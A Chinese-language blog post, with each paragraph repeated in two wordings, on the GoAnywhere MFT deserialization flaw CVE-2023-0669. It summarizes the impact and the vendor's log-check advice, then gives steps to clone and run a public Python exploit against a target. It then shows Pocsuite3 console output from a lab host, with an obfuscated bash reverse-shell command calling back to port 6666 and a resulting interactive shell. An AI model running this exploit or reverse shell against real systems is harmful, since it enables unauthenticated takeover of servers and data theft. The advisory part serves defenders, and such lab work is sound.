
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet 反序列化漏洞 Python RCE PoC(概念验证)
CVE-2023-0669 GoAnywhere MFT 反序列化 - Je Yiuwai's Blog
CVE-2023-0669是一个GoAnywhere MFT反序列化漏洞,由于反序列化一个任意攻击者控制的对象,在License Response Servlet中存在一个预先认证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而导致系统被完全控制。该漏洞影响版本为7.1.2之前,不包括7.1.2。
CVE-2023-0669 是 GoAnywhere MFT 中的一个反序列化漏洞,存在于 License Response Servlet 中。由于该 Servlet 在反序列化攻击者可控的对象时存在缺陷,导致了一个未经身份验证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而完全控制系统。该漏洞影响 7.1.2 之前的版本(不含 7.1.2)。
该漏洞可能会对企业级文件传输软件GoAnywhere MFT的安全性造成严重威胁。攻击者可以通过利用该漏洞来窃取敏感数据、篡改数据、破坏系统等。因此,用户需要及时采取措施来保护系统安全。
该漏洞对企业级文件传输软件 GoAnywhere MFT 的安全性构成了严重威胁。攻击者可利用该漏洞窃取敏感数据、篡改数据或破坏系统。因此,用户需要立即采取措施保护系统安全。
官方已经发布了安全通告,并提供了初步检查方法。用户可以检查userdata/logs日志中是否有特定字符串出现来判断系统是否受到此漏洞的影响。如果无法更新补丁,建议采取其他安全措施来保护系统安全。
官方已发布安全公告,并提供了初步检测方法。用户可通过检查 userdata/logs 日志中是否出现特定字符串来判断系统是否受到影响。若无法更新补丁,建议采取其他安全措施保护系统。
总之,CVE-2023-0669是一个需要引起用户重视的反序列化漏洞,用户需要及时更新到最新版本,并检查系统是否受到此漏洞的影响。同时,建议用户加强对GoAnywhere MFT等企业级软件的安全管理,采取多层次的安全措施来保护系统安全。
总之,CVE-2023-0669 是一个需要用户警惕的反序列化漏洞。用户应及时更新至最新版本,并检查系统是否受到影响。此外,建议加强对 GoAnywhere MFT 等企业级软件的安全管理,采取多层安全措施保护系统。
该Exploit是一个基于Python的脚本,用于利用GoAnywhere MFT v6.7.9594及以下版本中的漏洞CVE-2023-0669。
该漏洞是由于GoAnywhere MFT在处理加密的Bundle请求时存在安全问题,攻击者可以发送特制的请求,并在目标服务器上执行任意代码。
1.克隆本仓库
git clone https://github.com/Avento/CVE-2023-0669.git
2.进入CVE-2023-0669目录
cd CVE-2023-0669
3.安装依赖库requests和cryptography
pip install requests cryptography
4.运行Exploit
python CVE-2023-0669.py --host <目标服务器IP>
该 Exploit 是一个 Python 脚本,用于利用 GoAnywhere MFT v6.7.9594 及更低版本中的 CVE-2023-0669 漏洞。
此漏洞是因为 GoAnywhere MFT 在处理加密的 Bundle 请求时存在安全问题,攻击者可发送特制请求,在目标服务器上执行任意代码。
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <target IP>
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
作者:Je Yiuwai 由 xiaomi pad 6 pro 编辑